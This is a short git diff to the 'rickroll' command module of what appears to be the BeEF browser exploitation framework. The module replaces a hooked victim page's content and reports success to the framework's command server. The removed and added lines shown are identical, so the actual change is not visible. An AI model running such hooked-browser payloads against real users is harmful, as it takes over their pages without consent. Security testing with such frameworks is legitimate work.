diff --git a/modules/browser/hooked_domain/rickroll/command.js b/modules/browser/hooked_domain/rickroll/command.js
index 858f24cb7..84b74131e 100644
--- a/modules/browser/hooked_domain/rickroll/command.js
+++ b/modules/browser/hooked_domain/rickroll/command.js
@@ -10,6 +10,6 @@ beef.execute(function() {
$j('body').css({'padding':'0px', 'margin':'0px', 'height':'100%'});
$j('html').css({'padding':'0px', 'margin':'0px', 'height':'100%'});
- $j('body').html('');
+ $j('body').html('');
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Rickroll Successful");
});